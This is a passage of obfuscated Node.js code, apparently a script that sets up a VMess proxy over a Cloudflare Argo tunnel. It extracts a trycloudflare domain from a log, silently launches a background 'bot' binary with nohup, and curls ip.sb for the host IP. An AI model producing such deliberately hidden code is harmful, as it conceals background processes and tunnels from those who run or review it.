8,_0xcba225:0x1b6},_0x28bc53={_0x79f7bc:0x102},_0x1720ea={'NCDCM':_0x1e8717(_0x30963d._0x14a625,_0x30963d._0x40048b,_0x30963d._0x375a06,0x206),'lPpJl':function(_0x4c404d,_0x1038c7){return _0x4c404d(_0x1038c7);},'niRvN':'curl\x20-s\x20--max-time\x201\x20ipv6.ip.sb','KmxGk':_0x1e8717(_0x30963d._0xe5092a,0x21a,-_0x30963d._0x30329c,0x1b3),'SUNub':function(_0x1d6f95,_0x19be19){return _0x1d6f95(_0x19be19);},'mYwBx':function(_0x535276,_0x4659f7){return _0x535276&&_0x4659f7;},'ugZRY':function(_0x690e0b,_0x353efe){return _0x690e0b!==_0x353efe;},'xetiv':_0x3b6029(-_0x30963d._0x11f11a,-_0x30963d._0x16e8e,_0x30963d._0x3add8c,_0x30963d._0x198762),'dqOrU':function(_0x218bfe,_0x3ca74e){return _0x218bfe===_0x3ca74e;},'mWgWA':_0x3b6029(-_0x30963d._0x48c621,_0x30963d._0x148a11,-0xd3,-_0x30963d._0x141fe8),'QHCOm':_0x3b6029(_0x30963d._0x38caac,_0x30963d._0x2bb8df,-_0x30963d._0x52d052,_0x30963d._0x22d46c),'nrFLS':_0x3b6029(-0x111,-0x82,-0x163,-_0x30963d._0xd15525),'iQUYg':'boot.log','pEBlc':_0x1e8717(_0x30963d._0x16c9b8,_0x30963d._0x160c15,0x288,0x1d5),'aBaWD':function(_0x1c143c,_0xe0d40d){return _0x1c143c>_0xe0d40d;},'eSQYB':'ArgoDomain\x20not\x20found,\x20re-running\x20bot\x20to\x20obtain\x20ArgoDomain','KsfRf':function(_0x29e1ad){return _0x29e1ad();},'KsKpQ':_0x1e8717(_0x30963d._0x56dfe4,0x1b2,0x29c,_0x30963d._0x599a72)};function _0x3b6029(_0x13d5f9,_0x1a0849,_0xab734b,_0x22e08f){return _0x33ccd3(_0x13d5f9-0x16d,_0x1a0849- -0x6c7,_0xab734b-_0x28bc53._0x79f7bc,_0x22e08f);}let _0x3ce63f;function _0x1e8717(_0x3df6b5,_0x4bcff2,_0x4f1d36,_0x4d7904){return _0x33ccd3(_0x3df6b5-_0x404e5e._0x281836,_0x3df6b5- -_0x404e5e._0x5b22ef,_0x4f1d36-_0x404e5e._0xcba225,_0x4f1d36);}if(_0x1720ea[_0x3b6029(-_0x30963d._0x263fc7,-_0x30963d._0x423e26,_0x30963d._0x4fec29,_0x30963d._0x44cd7a)](ARGO_AUTH,ARGO_DOMAIN)){if(_0x1720ea['ugZRY'](_0x1e8717(_0x30963d._0x462155,-_0x30963d._0xb54368,0x143,-_0x30963d._0x366581),_0x1720ea[_0x3b6029(-_0x30963d._0x4d8a15,_0x30963d._0x41fc16,_0x30963d._0x5e155f,_0x30963d._0x182101)]))_0x3ce63f=ARGO_DOMAIN,console[_0x3b6029(-_0x30963d._0x3eef88,_0x30963d._0x3d521d,_0x30963d._0x22f3d7,_0x30963d._0x19dcf0)](_0x3b6029(-_0x30963d._0x443c31,-_0x30963d._0x57b166,-_0x30963d._0x1be551,-_0x30963d._0x5e155f),_0x3ce63f),await generateLinks(_0x3ce63f);else{_0x477542[_0x1e8717(_0x30963d._0x1ba114,_0x30963d._0x576522,_0x30963d._0xbd0a9c,_0x30963d._0x2a329e)](_0x1720ea['NCDCM']);return;}}else{if(_0x1720ea['dqOrU'](_0x1720ea[_0x1e8717(_0x30963d._0x372ecc,_0x30963d._0x234048,_0x30963d._0x27442c,_0x30963d._0x100292)],'gTDvq'))try{if(_0x1720ea[_0x3b6029(_0x30963d._0x40e437,-_0x30963d._0xf2d057,-_0x30963d._0x4c4798,-0x4c)]===_0x1720ea[_0x1e8717(_0x30963d._0x20ea9d,_0x30963d._0x1155d2,0x1df,_0x30963d._0x4a0f6b)])_0x508097='['+_0x1720ea[_0x1e8717(0x11a,_0x30963d._0xe5092a,0x8f,_0x30963d._0xc644ea)](_0x4e66e9,_0x1720ea[_0x3b6029(-_0x30963d._0x4d9599,-_0x30963d._0x45960a,-_0x30963d._0x300079,-_0x30963d._0x2053e0)])['toString']()[_0x3b6029(_0x30963d._0x6f6d7b,0xff,-_0x30963d._0x551fa1,_0x30963d._0x16475b)]()+']';else{const _0x173acf=fs['readFileSync'](path['join'](FILE_PATH,_0x1720ea[_0x1e8717(_0x30963d._0x56f7a0,0x1a6,_0x30963d._0xa85ed0,_0x30963d._0x2eaa67)]),_0x1720ea[_0x3b6029(-_0x30963d._0x320a53,-0x13d,-_0x30963d._0x58696c,-_0x30963d._0x1e74a3)]),_0x2c0163=_0x173acf[_0x3b6029(-_0x30963d._0x584490,-0x59,_0x30963d._0x219178,-0x102)]('\x0a'),_0x539264=[];_0x2c0163['forEach'](_0x5c685c=>{const _0x1845a1={_0x35af0f:0xc3,_0x2c5410:0x1ad};function _0x31b11c(_0x286eb8,_0x5c8553,_0x4aec02,_0x1abe3c){return _0x1e8717(_0x286eb8-0x3d0,_0x5c8553-_0x1845a1._0x35af0f,_0x5c8553,_0x1abe3c-_0x1845a1._0x2c5410);}function _0x14e5ce(_0x21624b,_0x4fa74d,_0x267f84,_0xa0bfa1){return _0x1e8717(_0x21624b-_0x249e9f._0x1dcb59,_0x4fa74d-_0x249e9f._0x3b470f,_0x267f84,_0xa0bfa1-_0x249e9f._0x311b43);}const _0x48cf2d=_0x5c685c[_0x31b11c(_0x5cc66a._0x38bf04,_0x5cc66a._0x5443f7,0x48a,_0x5cc66a._0x1227cc)](/https?:\/\/([^ ]*trycloudflare\.com)\/?/);if(_0x48cf2d){const _0x31ed34=_0x48cf2d[0x5d*0x26+-0x1c3d*0x1+0xe*0x108];_0x539264[_0x31b11c(_0x5cc66a._0x2496c1,_0x5cc66a._0x23f51f,_0x5cc66a._0x4e63c1,_0x5cc66a._0x430b15)](_0x31ed34);}});if(_0x1720ea[_0x1e8717(_0x30963d._0x1c94f5,_0x30963d._0x23c0a3,_0x30963d._0x210491,_0x30963d._0x35e470)](_0x539264[_0x3b6029(-_0x30963d._0x3b4469,-_0x30963d._0x1a5b48,-_0x30963d._0x1a0497,-_0x30963d._0x2b7d28)],0x4b1*-0x1+-0x1a90+0x3f*0x7f))_0x3ce63f=_0x539264[-0x1*-0x13c+0x38f+-0x4cb],console['log'](_0x3b6029(_0x30963d._0x159f49,_0x30963d._0x582539,0xad,-_0x30963d._0x5f5138),_0x3ce63f),await generateLinks(_0x3ce63f);else{console['log'](_0x1720ea[_0x1e8717(_0x30963d._0x50730f,_0x30963d._0x366000,_0x30963d._0x2cba9e,-_0x30963d._0x399007)]),fs[_0x1e8717(_0x30963d._0x4bfd4c,_0x30963d._0x32b0d7,_0x30963d._0x4783e4,_0x30963d._0x2065f2)](path[_0x1e8717(0x23b,0x281,_0x30963d._0x51ac7c,0x291)](FILE_PATH,_0x1720ea['iQUYg']));async function _0x50970c(){const _0x59a6d9={_0x376d58:0x19e,_0x35f014:0x1e9,_0x8ff896:0xd3},_0x59db2b={_0x128c07:0xe9,_0x207851:0x466,_0xf27749:0x48};function _0x276ae1(_0x1d479b,_0x177b96,_0x42a116,_0x533d93){return _0x3b6029(_0x1d479b-_0x59db2b._0x128c07,_0x533d93-_0x59db2b._0x207851,_0x42a116-_0x59db2b._0xf27749,_0x42a116);}function _0x5a2ecd(_0x1af0bd,_0x519405,_0x109c83,_0x4c1905){return _0x1e8717(_0x109c83- -_0x59a6d9._0x376d58,_0x519405-_0x59a6d9._0x35f014,_0x519405,_0x4c1905-_0x59a6d9._0x8ff896);}try{_0x1720ea[_0x276ae1(_0x27901b._0x2aeec0,_0x27901b._0x464487,_0x27901b._0x2f84b4,_0x27901b._0x370ba7)]!==_0x1720ea['KmxGk']?_0xedf9bf[_0x276ae1(0x1e7,0x336,_0x27901b._0x4e5ea2,0x30e)](_0x5a2ecd(0x27,-_0x27901b._0x3d89a7,0xaf,_0x27901b._0x45e127)+_0x54135a):await _0x1720ea[_0x5a2ecd(-_0x27901b._0x46c592,0x84,0x8f,-_0x27901b._0xbdce20)](exec,_0x276ae1(_0x27901b._0x5ebbf0,_0x27901b._0x442c89,0x601,_0x27901b._0x225daa)+botRandomName+_0x276ae1(_0x27901b._0xbfce07,0x305,0x3b2,0x426));}catch(_0x3c8d7e){return null;}}_0x1720ea[_0x3b6029(_0x30963d._0x126dd4,-_0x30963d._0x67e255,0x25,_0x30963d._0x5c8590)](_0x50970c),await new Promise(_0xfabf99=>setTimeout(_0xfabf99,-0x100b*-0x1+0x10db+-0x6*0x4d5));const _0x16dcd9=_0x1e8717(_0x30963d._0xc75fce,_0x30963d._0xebda2b,_0x30963d._0x3eb699,_0x30963d._0x51a4d8)+FILE_PATH+_0x1e8717(_0x30963d._0x4c631e,_0x30963d._0x4d5946,_0x30963d._0x361443,_0x30963d._0x4b971c)+ARGO_PORT;try{if(_0x1720ea[_0x3b6029(_0x30963d._0x384b70,0xc7,_0x30963d._0x1f2871,_0x30963d._0x58651a)](_0x1720ea[_0x1e8717(_0x30963d._0xb82664,0x191,_0x30963d._0x189e6d,0x200)],'UHHTp'))await _0x1720ea[_0x1e8717(_0x30963d._0x27a38f,_0x30963d._0x3491ea,-_0x30963d._0x410fb4,0x97)](exec,'nohup\x20'+path['join'](FILE_PATH,botRandomName)+'\x20'+_0x16dcd9+'\x20>/dev/null\x202>&1\x20&'),console['log'](_0x1e8717(0x6a,-0x68,-_0x30963d._0x3846f4,-_0x30963d._0x30abee)),await new Promise(_0xdf6306=>setTimeout(_0xdf6306,-0x2a35+-0x5*-0x64a+0x2233)),await extractDomains();else{const _0x2378d3={_0x231c0c:0x5e0,_0xf7764c:0x552},_0x5901c0=_0x686928?function(){const _0x3264b2={_0x5204e4:0x492,_0x5f567a:0x95,_0x5011a9:0x109};function _0x9ec306(_0x1aeeda,_0x553479,_0x2f7d3c,_0x26a623){return _0x1e8717(_0x1aeeda-_0x3264b2._0x5204e4,_0x553479-_0x3264b2._0x5f567a,_0x553479,_0x26a623-_0x3264b2._0x5011a9);}if(_0x3eb907){const _0x1c256f=_0x5310fd[_0x9ec306(_0x2378d3._0x231c0c,0x59e,_0x2378d3._0xf7764c,0x6c6)](_0x45e5c4,arguments);return _0x473f50=null,_0x1c256f;}}:function(){};return _0x4f90f4=![],_0x5901c0;}}catch(_0x1ce03f){console[_0x1e8717(0x87,_0x30963d._0x1d4db4,0x15f,0x4b)](_0x3b6029(_0x30963d._0x438d17,_0x30963d._0x434ef8,_0x30963d._0x2c3944,0x54)+_0x1ce03f);}}}}catch(_0x3afb46){console[_0x3b6029(-_0x30963d._0x58fa77,-_0x30963d._0x555665,-_0x30963d._0x56a093,-0x21f)](_0x3b6029(-_0x30963d._0x2c6ae1,_0x30963d._0x4f82ce,0x41,_0x30963d._0x518870),_0x3afb46);}else{if(_0x41081f[_0x1e8717(_0x30963d._0x3e842b,_0x30963d._0x62a392,_0x30963d._0x41052e,0x20b)]){if(_0x3109a7[_0x1e8717(0x107,_0x30963d._0x45960a,_0x30963d._0x486691,_0x30963d._0x123b8f)][_0x3b6029(-_0x30963d._0x3ef31f,-_0x30963d._0x54cfcc,-_0x30963d._0x13818d,-_0x30963d._0x3816c5)]===-0x2*-0x511+-0x5*-0xa9+0x3f5*-0x3){}}}}}async function generateLinks(_0x57de72){const _0x1fa447={_0x54c4ac:0x56c,_0x23f34e:0x4e0,_0x42d299:0x70e,_0x334b7f:0x1ca,_0x566475:0x1ac,_0x5efdc0:0x13c,_0x2df521:0x2f,_0x5e7b5c:0x640,_0x44e636:0x625,_0x553f62:0x55d,_0x4bb570:0x59a,_0x2ff170:0x76d,_0x38155a:0x815,_0x1a647e:0x66f,_0xf56572:0x88f,_0x55ed29:0x6b2,_0x5c4c02:0x878,_0x47e951:0x683,_0x88adf5:0x688,_0x1b33fb:0x763,_0x11436f:0x6b1,_0x477bdc:0x49,_0xc7e143:0x44,_0xf8d7e6:0x59,_0x15c554:0x1a6,_0x43f820:0x5f,_0x2f0532:0x5ca,_0x58468e:0x53f,_0x21995d:0x4c5,_0x3126ef:0x60c,_0x27d581:0x5cd,_0x24e164:0x5f6,_0x372b3c:0x631,_0x30d6d2:0x6ba,_0x75c7ac:0x72b,_0x3ddcf2:0x449,_0x45a6b3:0x567,_0x999264:0x524,_0x11bfc4:0x5f6,_0x39027b:0x586,_0x228400:0x745,_0x1d2c76:0x5b1,_0x20c2ca:0x6a2,_0x5c129a:0x6cc,_0xa25ad0:0x5d5,_0x5d4a20:0x687,_0x18bb23:0x64b,_0x2d2238:0x57b,_0x238dfd:0x770,_0x1e3b98:0x79d,_0x4d7214:0x7c8,_0xbc4799:0x5b2,_0x49cd8d:0x5e8,_0xcd4983:0x551,_0x3d43a1:0x5d1,_0x303adf:0x6b7,_0x2ba9e8:0x616,_0x7abba:0x4d3,_0x7bd80e:0xab,_0x114167:0xcd,_0x3765fa:0xd8,_0x2e5405:0xa1,_0x3ecaa6:0xd,_0x4f5a63:0x1d7,_0x5dc942:0x28,_0x283110:0x91,_0x2f100e:0xc0,_0x4149ef:0x3c,_0xb20cc4:0x71b,_0x1b961a:0x6fa,_0x794ea0:0x7ce,_0x47292e:0x704,_0x399d65:0x5f0,_0x29e057:0x628,_0x2c36c2:0x6ac,_0x22781d:0x5e0,_0x583e18:0xaa,_0x4f6d3c:0x2d,_0x5ac45e:0x8,_0xa9262e:0x196,_0x39c29c:0x204,_0x566c1b:0x1b1,_0x5e0ccb:0x5f0,_0xc8abd0:0xe3,_0x4f7651:0x1a7,_0x191058:0x29,_0x16c801:0x622,_0x17f15d:0x69c,_0x1e4e72:0x5c0,_0x3907e3:0x575,_0x2e3c63:0x779,_0x149f10:0x6fa,_0x23a3d7:0x58f,_0x455b72:0x5fb,_0x1d7f9f:0x726,_0x48e3ed:0x6a4,_0x1d57f9:0x537,_0xc7e7b2:0x527,_0x1b13f7:0x4a7,_0x514af0:0x353,_0xb2dd7e:0x72,_0x4ae285:0x8b,_0x4dfe34:0xf},_0x3d93ec={_0x1071c0:0x155,_0x4f723d:0x221,_0x151add:0xe8,_0x195c7b:0xfd,_0x1d2bb8:0x3d3,_0xaff4e0:0x3ea,_0x3110ca:0x426,_0x192da9:0x26c,_0x4033f:0x304,_0xa1cec3:0x300,_0x254d3c:0x333,_0x50f97b:0x571,_0x7d25bd:0x4db,_0x41881a:0x4e9,_0x3ba614:0x19d,_0x113b59:0x17c,_0x2b0391:0x185,_0x5bcb44:0x295,_0x457748:0x3aa},_0xb23d16={_0x18082b:0x56,_0x213398:0x46,_0x4c49e7:0x35,_0x472fcb:0xaa,_0x35e6bc:0xf5,_0x494798:0x1,_0x2d59ca:0xb7,_0x2d22e9:0x177,_0x563293:0x14a,_0xbdde91:0x1d5,_0x2faad6:0x2bf,_0x2e80a0:0x1ff,_0x25a47d:0x98,_0x30291b:0x6,_0x274a1d:0xa2,_0x7430b6:0x7e,_0x323fdf:0x6b,_0x147841:0x1c4,_0x303ee1:0xa5,_0x5d3060:0x112,_0x278be1:0x5,_0x4896ba:0x73,_0x1e5720:0x1c3,_0x280d11:0xd0,_0xe08b11:0x30a,_0x4e6e7d:0x1b5,_0x50f303:0x2ed,_0x1aaa4e:0x2b2,_0x3d2054:0x204,_0x194cb0:0x1b3,_0x56bd12:0x12f,_0x2de60c:0x173,_0x2cdfe3:0x1e8,_0x562887:0x3d,_0x1e4c12:0xbd,_0x4a64bc:0x37,_0x44ed78:0x1d4,_0x31584c:0x244,_0x5ee3fd:0xe4,_0x9a00c0:0x61,_0x10365a:0x1a9,_0x28fc78:0x1b7,_0x29c5e1:0x5b,_0xdcc798:0x24,_0x53f0ef:0x49,_0x1827ef:0x50,_0x2530ea:0x18d,_0x491136:0x8f,_0xe796d9:0xeb,_0x465b96:0xde,_0x51745e:0x65,_0x1701d6:0xc4,_0x1e0d78:0x197,_0x189b17:0x1cc,_0x4e265d:0x6a,_0x45edde:0x8b,_0x45cfdf:0xa8,_0x357f8a:0x4c,_0x4661f7:0x5,_0x47d930:0x76,_0x3494e4:0x127,_0x2b1da5:0x27,_0x4383f5:0x12c,_0xdb0e49:0xb9,_0x32b6bc:0x2af,_0x251a80:0x1ef,_0x43c7bb:0x103,_0x47e0d3:0x19f,_0xee1876:0x1dd,_0x4ae8b0:0x231,_0x282a8c:0x312,_0x2a8cbd:0xb,_0x5af8f9:0x79,_0x599876:0x13b,_0x295f00:0x1c4,_0x5f2a7c:0xf8,_0x7be7d9:0x36,_0x198e49:0x143,_0x506730:0xe7,_0x10b0c3:0x3,_0x5ac9f9:0xb0,_0x2d6584:0x248,_0x1d9eeb:0x1a9,_0x48fd0b:0x4c,_0x5efc18:0x25d,_0x5773ad:0x7e,_0x317150:0xfb,_0x59a367:0x19,_0x2a3fed:0x67,_0x39180b:0x15,_0x1ad4a3:0x43,_0x2de392:0x14,_0x5d9cd6:0xb7,_0x199dd0:0x2f2,_0x207c08:0x358,_0x1d37ac:0xa6,_0x1c41f0:0xe0,_0x25a6e1:0x145,_0x31606d:0x101,_0x5a1571:0x132,_0x3125a8:0x1d,_0x1972f0:0xac,_0x236de2:0x8a,_0x698e8:0x81,_0x4c9ed7:0x1b9,_0x5bd48:0x1d9,_0x4e805e:0x116,_0x361305:0x4f,_0x360c9c:0x193,_0x252c13:0x123,_0x538094:0x6d,_0x16617e:0x32,_0xc06e9d:0xc2,_0x585c95:0x216},_0x2c28ee={_0x5b5a3c:0x208,_0x13b847:0x121},_0x3fdbe6={_0x376e52:0x161,_0xf285a6:0x56,_0x1fab18:0x158},_0x4db2a7={'TQCPK':_0x2beecc(_0x1fa447._0x54c4ac,0x5e2,_0x1fa447._0x23f34e,_0x1fa447._0x42d299),'weurq':_0x35db49(-0xa7,-_0x1fa447._0x334b7f,-0x90,-_0x1fa447._0x566475),'LzIiu':_0x35db49(0xae,_0x1fa447._0x5efdc0,0x7a,_0x1fa447._0x2df521),'vLgfC':'/vmess-argo?ed=2560','Nbqtm':'firefox','dtUCv':_0x2beecc(_0x1fa447._0x5e7b5c,_0x1fa447._0x44e636,_0x1fa447._0x553f62,_0x1fa447._0x4bb570),'nKzjj':function(_0x2f7551,_0x3bed57){return _0x2f7551(_0x3bed57);},'Wzwcc':_0x2beecc(_0x1fa447._0x2ff170,0x76c,_0x1fa447._0x38155a,_0x1fa447._0x1a647e),'FqdaG':'tjUBH','wPVkG':function(_0x3b1515,_0x8ce291){return _0x3b1515(_0x8ce291);},'oncJU':function(_0x242ad9,_0x15e7dc){return _0x242ad9!==_0x15e7dc;},'rntmn':_0x2beecc(_0x1fa447._0xf56572,0x761,_0x1fa447._0x55ed29,_0x1fa447._0x5c4c02),'PFGBy':function(_0x105510,_0x31a48c){return _0x105510(_0x31a48c);},'iGGGA':_0x2beecc(_0x1fa447._0x47e951,_0x1fa447._0x88adf5,_0x1fa447._0x1b33fb,_0x1fa447._0x11436f),'fTwTU':function(_0x18e36f){return _0x18e36f();},'EhYKV':function(_0x4a584c,_0x5ce68d){return _0x4a584c(_0x5ce68d);},'wetSE':function(_0x3e3cb7,_0x1596ef){return _0x3e3cb7||_0x1596ef;},'TBjSp':function(_0x2175b3,_0x7919a9){return _0x2175b3===_0x7919a9;},'azgFL':_0x35db49(_0x1fa447._0x477bdc,0xad,0x182,_0x1fa447._0xc7e143),'QVHwe':function(_0x4e0ea6,_0x17b5a1,_0x4e28b0){return _0x4e0ea6(_0x17b5a1,_0x4e28b0);},'jeLmB':_0x35db49(_0x1fa447._0xf8d7e6,-_0x1fa447._0x15c554,_0x1fa447._0x43f820,-_0x1fa447._0x2df521),'imFIw':_0x2beecc(_0x1fa447._0x2f0532,_0x1fa447._0x58468e,_0x1fa447._0x21995d,0x461),'WuVYz':_0x2beecc(_0x1fa447._0x3126ef,_0x1fa447._0x27d581,_0x1fa447._0x24e164,_0x1fa447._0x372b3c),'iTGCX':_0x2beecc(_0x1fa447._0x1b33fb,0x65e,_0x1fa447._0x30d6d2,_0x1fa447._0x75c7ac),'renAu':function(_0x3074c1,_0x38fd4c,_0x4c38a4){return _0x3074c1(_0x38fd4c,_0x4c38a4);},'nMeJh':_0x2beecc(_0x1fa447._0x3ddcf2,_0x1fa447._0x45a6b3,_0x1fa447._0x999264,_0x1fa447._0x11bfc4),'bYbpA':_0x2beecc(_0x1fa447._0x39027b,0x651,_0x1fa447._0x228400,_0x1fa447._0x1d2c76)};let _0x5d33be='';try{_0x5d33be=execSync(_0x4db2a7[_0x2beecc(_0x1fa447._0x20c2ca,_0x1fa447._0x5c129a,_0x1fa447._0xa25ad0,0x74a)])[_0x2beecc(_0x1fa447._0x5d4a20,_0x1fa447._0x18bb23,0x752,_0x1fa447._0x2d2238)]()[_0x2beecc(0x843,_0x1fa447._0x238dfd,_0x1fa447._0x1e3b98,_0x1fa447._0x4d7214)]();}catch(_0xdc527d){try{_0x2beecc(0x424,0x53f,_0x1fa447._0xbc4799,0x44b)===_0x4db2a7[_0x2beecc(_0x1fa447._0x49cd8d,_0x1fa447._0x55ed29,_0x1fa447._0xcd4983,_0x1fa447._0x3d43a1)]?_0x5d33be='['+_0x4db2a7[_0x2beecc(_0x1fa447._0x303adf,_0x1fa447._0x2ba9e8,_0x1fa447._0x7abba,0x725)](execSync,_0x4db2a7[_0x35db49(-_0x1fa447._0x7bd80e,-_0x1fa447._0x114167,-_0x1fa447._0x3765fa,0x46)])[_0x35db49(_0x1fa447._0x2e5405,-_0x1fa447._0x3ecaa6,-_0x1fa447._0x4f5a63,-0x7f)]()[_0x35db49(-_0x1fa447._0x5dc942,-0xa8,_0x1fa447._0x283110,0xa6)]()+']':(_0x11de81[_0x35db49(-_0x1fa447._0x2f100e,-0xe0,-_0x1fa447._0x4149ef,-0x70)](_0x3b0b3c),_0xa65e19[_0x2beecc(_0x1fa447._0xb20cc4,_0x1fa447._0x1b961a,0x650,0x7a2)](_0x4aafa3+_0x2beecc(_0x1fa447._0x794ea0,_0x1fa447._0x47292e,_0x1fa447._0x4d7214,_0x1fa447._0x399d65)));}catch(_0x31f6dc){_0x4db2a7[_0x2beecc(_0x1fa447._0x29e057,_0x1fa447._0x2c36c2,_0x1fa447._0x22781d,0x568)]===_0x4db2a7[_0x35db49(_0x1fa447._0x583e18,-_0x1fa447._0x4f6d3c,-_0x1fa447._0x5ac45e,-0x1e)]?console[_0x35db49(-_0x1fa447._0xa9262e,-0x17c,-_0x1fa447._0x39c29c,-_0x1fa447._0x566c1b)]('Failed\x20to\x20get\x20IP\x20address:',_0x31f6dc['message']):(_0x2c8e3b[_0x2beecc(0x716,0x5fd,0x6d3,_0x1fa447._0x5e0ccb)](),_0x4089cd[_0x35db49(_0x1fa447._0xc8abd0,_0x1fa447._0x4f7651,-_0x1fa447._0x191058,0x30)](_0x4db2a7[_0x2beecc(_0x1fa447._0x16c801,_0x1fa447._0x17f15d,_0x1fa447._0x1e4e72,_0x1fa447._0x3907e3)]),_0x10504c[_0x2beecc(_0x1fa447._0x2e3c63,_0x1fa447._0x149f10,_0x1fa447._0x23a3d7,_0x1fa447._0x455b72)](_0x4db2a7[_0x2beecc(_0x1fa447._0x1d7f9f,_0x1fa447._0x48e3ed,0x705,_0x1fa447._0x1d57f9)]));}}const _0x594daf=_0x4db2a7['renAu'](execSync,_0x4db2a7[_0x2beecc(_0x1fa447._0xc7e7b2,_0x1fa447._0x1b13f7,0x45f,_0x1fa447._0x514af0)],{'encoding':_0x4db2a7[_0x35db49(_0x1fa447._0xb2dd7e,_0x1fa447._0x4ae285,-0x36,_0x1fa447._0x4dfe34)]}),_0x4f4a85=_0x594daf['trim'](),_0x571f7c=NAME?NAME+'-'+_0x4f4a85:_0x4f4a85;function _0x2beecc(_0x7a8e2a,_0x22aad4,_0x89d4b,_0x503f23){return _0x33ccd3(_0x7a8e2a-_0x3fdbe6._0x376e52,_0x22aad4- -_0x3fdbe6._0xf285a6,_0x89d4b-_0x3fdbe6._0x1fab18,_0x503f23);}function _0x35db49(_0x48aaa8,_0x280bb7,_0x1a6ee6,_0xc75540){return _0x33ccd3(_0x48aaa8-0x1ba,_0xc75540- -0x720,_0x1a6ee6-0xc2,_0x280bb7);}return new Promise(_0x1620dc=>{const _0x48d217={_0x5e6ec8:0x33f,_0x37093b:0x0,_0x400e4e:0x62},_0x226aff={_0x2c7e29:0x2e2,_0x51915c:0x19c},_0x770e77={_0x5c962e:0x11e,_0x31db0e:0x1d9},_0x3b72fe={_0x13b24c:0x6e},_0x42fd6f={_0x3d7a4c:0x7a0,_0x41413f:0x5b3,_0xd8c44e:0x5c9},_0x3d9c9d={_0x11509e:0x3a2},_0x1a39ed={_0x4b9fab:0xe1,_0x5a2711:0x38,_0x438f93:0x33d};function _0x11ff0b(_0x1a5c4b,_0x4ab858,_0x2c1d5c,_0x45a834){return _0x35db49(_0x1a5c4b-_0x1a39ed._0x4b9fab,_0x45a834,_0x2c1d5c-_0x1a39ed._0x5a2711,_0x1a5c4b-_0x1a39ed._0x438f93);}const _0x2adee8={'efWSL':function(_0x22c88a,_0x42e626){function _0x2b22d1(_0x4bf79b,_0x34c976,_0x10957f,_0x38564d){return _0x325c(_0x10957f-_0x3d9c9d._0x11509e,_0x34c976);}return _0x4db2a7[_0x2b22d1(_0x42fd6f._0x3d7a4c,_0x42fd6f._0x41413f,0x639,_0x42fd6f._0xd8c44e)](_0x22c88a,_0x42e626);},'CzPdt':function(_0x1bba7b,_0x327521){function _0x5325a1(_0x5a7c51,_0xee08e1,_0x425af7,_0x2f334a){return _0x325c(_0xee08e1- -_0x3b72fe._0x13b24c,_0x2f334a);}return _0x4db2a7[_0x5325a1(_0x2c28ee._0x5b5a3c,0x293,0x3b0,_0x2c28ee._0x13b847)](_0x1bba7b,_0x327521);},'NkfMe':_0x4db2a7[_0x11ff0b(_0x3d93ec._0x1071c0,_0x3d93ec._0x4f723d,_0x3d93ec._0x151add,_0x3d93ec._0x195c7b)]};function _0x1dff94(_0x1eb04a,_0x3604cc,_0x396e5a,_0x446825){return _0x2beecc(_0x1eb04a-0x69,_0x396e5a- -_0x770e77._0x5c962e,_0x396e5a-_0x770e77._0x31db0e,_0x446825);}if(_0x4db2a7[_0x1dff94(_0x3d93ec._0x1d2bb8,_0x3d93ec._0xaff4e0,0x4e1,_0x3d93ec._0x3110ca)](_0x4db2a7[_0x11ff0b(_0x3d93ec._0x192da9,_0x3d93ec._0x4033f,_0x3d93ec._0xa1cec3,_0x3d93ec._0x254d3c)],_0x4db2a7[_0x1dff94(_0x3d93ec._0x50f97b,0x4a8,_0x3d93ec._0x7d25bd,_0x3d93ec._0x41881a)]))_0x4db2a7[_0x11ff0b(_0x3d93ec._0x3ba614,_0x3d93ec._0x113b59,_0x3d93ec._0x2b0391,_0x3d93ec._0x5bcb44)](setTimeout,()=>{const _0x52c549={_0x255626:0x18c,_0x5cb00d:0x4f,_0x28e85d:0x10e,_0x22646b:0x1c6,_0x110bb2:0x254,_0x5ea708:0xef,_0x22a003:0x199,_0x169f2f:0x1bd,_0x2288a9:0x23f,_0x13035b:0x21c,_0x534ca0:0x5f,_0x416d50:0x9a,_0x48ee26:0x248,_0x4f6986:0x202,_0x579302:0x2e9,_0x132075:0x2af},_0x20fce8={};_0x20fce8['v']='2',_0x20fce8['ps']=''+_0x571f7c,_0x20fce8['add']=CFIP,_0x20fce8[_0x288b28(_0xb23d16._0x18082b,-0x11,_0xb23d16._0x213398,-_0xb23d16._0x4c49e7)]=CFPORT;function _0x17cde5(_0x17bd8b,_0x3c3578,_0x144df3,_0x51ad15){return _0x11ff0b(_0x3c3578- -_0x226aff._0x2c7e29,_0x3c3578-_0x226aff._0x51915c,_0x144df3-0x47,_0x17bd8b);}_0x20fce8['id']=UUID,_0x20fce8[_0x17cde5(_0xb23d16._0x472fcb,0x27,-0x41,-_0xb23d16._0x35e6bc)]='0',_0x20fce8[_0x288b28(_0xb23d16._0x494798,-_0xb23d16._0x2d59ca,-_0xb23d16._0x2d22e9,-0x173)]=_0x4db2a7[_0x17cde5(-_0xb23d16._0x563293,-_0xb23d16._0xbdde91,-_0xb23d16._0x2faad6,-0x14c)],_0x20fce8['net']='ws',_0x20fce8[_0x288b28(_0xb23d16._0x2e80a0,_0xb23d16._0x25a47d,0x85,-_0xb23d16._0x30291b)]=_0x4db2a7['LzIiu'],_0x20fce8[_0x17cde5(-_0xb23d16._0x274a1d,_0xb23d16._0x7430b6,-_0xb23d16._0x323fdf,_0xb23d16._0x147841)]=_0x57de72,_0x20fce8[_0x17cde5(-_0xb23d16._0x303ee1,-_0xb23d16._0x5d3060,_0xb23d16._0x278be1,-_0xb23d16._0x4896ba)]=_0x4db2a7['vLgfC'],_0x20fce8[_0x288b28(-_0xb23d16._0x1e5720,-0x227,-_0xb23d16._0x280d11,-_0xb23d16._0xe08b11)]=_0x17cde5(-_0xb23d16._0x4e6e7d,-0x1ca,-_0xb23d16._0x50f303,-0x30f),_0x20fce8[_0x288b28(-_0xb23d16._0x1aaa4e,-_0xb23d16._0x3d2054,-0x33f,-_0xb23d16._0x194cb0)]=_0x57de72;function _0x288b28(_0x24bb85,_0x5b5916,_0xc0a92f,_0x5434ef){return _0x11ff0b(_0x5b5916- -_0x48d217._0x5e6ec8,_0x5b5916-_0x48d217._0x37093b,_0xc0a92f-_0x48d217._0x400e4e,_0x24bb85);}_0x20fce8[_0x288b28(-_0xb23d16._0x56bd12,-_0xb23d16._0x2de60c,-_0xb23d16._0x2cdfe3,-_0xb23d16._0x2e80a0)]='',_0x20fce8['fp']=_0x4db2a7[_0x17cde5(-_0xb23d16._0x562887,_0xb23d16._0x1e4c12,_0xb23d16._0x4a64bc,_0xb23d16._0x44ed78)];const 